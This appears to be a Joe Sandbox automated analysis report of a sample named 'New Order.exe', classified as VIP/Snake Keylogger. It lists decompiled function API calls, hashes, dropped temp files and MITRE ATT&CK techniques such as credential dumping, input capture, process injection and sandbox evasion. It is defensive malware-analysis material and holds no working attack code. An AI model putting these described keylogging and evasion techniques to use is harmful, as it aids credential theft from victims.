API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 79797c82b6096a2042a1cce11c340273b770de568911ac9b3b501fb7b4631951
Instruction ID: dcc235febf81ea95aedee7fa355c4a5ec91c527b13fe5776f0340924717bb99c
Opcode Fuzzy Hash: 79797c82b6096a2042a1cce11c340273b770de568911ac9b3b501fb7b4631951
Instruction Fuzzy Hash: 38E02B062543A0109232327B9CC597F57C9CFC9750751182BF981D6367EB94DDA193F1

Function 00320B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00320B23

Strings

AutoIt, xrefs: 00320B17
Error allocating memory., xrefs: 00320B1C

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 7feca03b448e0e4774bab5b8b3d5f6a1794b536f717742684c848f401818c886
Instruction ID: 167d167fe127da27d2ee8696363f8ee172b24314ddfb16967a3902e8f79f6d9d
Opcode Fuzzy Hash: 7feca03b448e0e4774bab5b8b3d5f6a1794b536f717742684c848f401818c886
Instruction Fuzzy Hash: 04E0D8312A43182ED21536957C07FC97B84CF09F55F10046BFB48555D38BD168644AAD

Function 002E0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 002DF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,002E0D71,?,?,?,002C100A), ref: 002DF7CE

IsDebuggerPresent.KERNEL32(?,?,?,002C100A), ref: 002E0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,002C100A), ref: 002E0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 002E0D7F

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: ff2d1914b9202f1fb76591b9677c272f3ba0edd47c81d7f283b9cb6f09a31412
Instruction ID: 66c02cf0611d4157f6e13918447a54626eaa1f21b5c7870a75dd2b5f5455d2b5
Opcode Fuzzy Hash: ff2d1914b9202f1fb76591b9677c272f3ba0edd47c81d7f283b9cb6f09a31412
Instruction Fuzzy Hash: 1DE06D742103818FE7629FB9D884B967BE4EB00749F40492DE882C6665DBF1E4898BA1

Function 002DE398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 002DE3D5

Strings

8%9, xrefs: 002DE3CA
0%9, xrefs: 002DE3B5

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%9$8%9
API String ID: 1385522511-2088886512
Opcode ID: ac4b0ec4080414e84c9f845f40b4338b834ec001a2371ab2810839c040bee0ac
Instruction ID: 0a35a9359f491a5a2863771043289909fca60c3a12d410c09ec5a87068813841
Opcode Fuzzy Hash: ac4b0ec4080414e84c9f845f40b4338b834ec001a2371ab2810839c040bee0ac
Instruction Fuzzy Hash: 49E02631475D10EBCE06BB18F894EBEB359AB06320F5301E7F1028F2D19B712C928A84

Function 0031D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0031D220

Strings

%.3d, xrefs: 0031D22B
X64, xrefs: 0031D2A8

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 19d63f439766c3c2f3d55fbb6c01a51e02099196cd16be422acc007be8a710af
Instruction ID: 07b84b35f241c7689d1911bcf88bad4e7feb02c3538c96d98700a4854377e7ca
Opcode Fuzzy Hash: 19d63f439766c3c2f3d55fbb6c01a51e02099196cd16be422acc007be8a710af
Instruction Fuzzy Hash: 9CD01261818218EACF9596D0CC459F9B37CEB1E301F608853F81791440D774D9996B61

Function 00352322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0035232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0035233F

Part of subcall function 0032E97B: Sleep.KERNEL32 ref: 0032E9F3

Strings

Shell_TrayWnd, xrefs: 00352325

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 5070697b854699da6578255d85b4d1308f1e882cf8dbcf0940591f720929a00e
Instruction ID: 494234a4483af6a350405606b29126052102d78feebfd7251c6eaadabd62719b
Opcode Fuzzy Hash: 5070697b854699da6578255d85b4d1308f1e882cf8dbcf0940591f720929a00e
Instruction Fuzzy Hash: DCD022323A0310BBE265B370EC1FFC6BA189B40B05F000902B305AA0E0C9F0A800CB44

Function 00352356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0035236C
PostMessageW.USER32(00000000), ref: 00352373

Part of subcall function 0032E97B: Sleep.KERNEL32 ref: 0032E9F3

Strings

Shell_TrayWnd, xrefs: 00352365

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 11bb5903baffb4e78ff206c6fde4083fa1e4fb111b09ee010ee49a80de6df4ca
Instruction ID: 278eaf2403d86e3d33b1b2a2f49038581d25212ea0e3f47fce3a6a8de25c2180
Opcode Fuzzy Hash: 11bb5903baffb4e78ff206c6fde4083fa1e4fb111b09ee010ee49a80de6df4ca
Instruction Fuzzy Hash: E0D0A9323903107AE266B370AC0FFC6A6189B40B05F000902B201AA0E0C9B0A8008A48

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report New Order.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Anglophile

C:\Users\user\AppData\Local\Temp\ageless

C:\Users\user\AppData\Local\Temp\autC751.tmp

C:\Users\user\AppData\Local\Temp\autC7A0.tmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
New Order.exe

Function 002C42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 002C42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00302BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 002C2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 002F8D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300
COMMONLIBRARYCODE

Function 0030065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 002C344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 002C2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 002C3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 014C2600 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 002C2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 014C23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151
fileCOMMON

Function 00332947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Function 002F5AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186
COMMONLIBRARYCODE

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre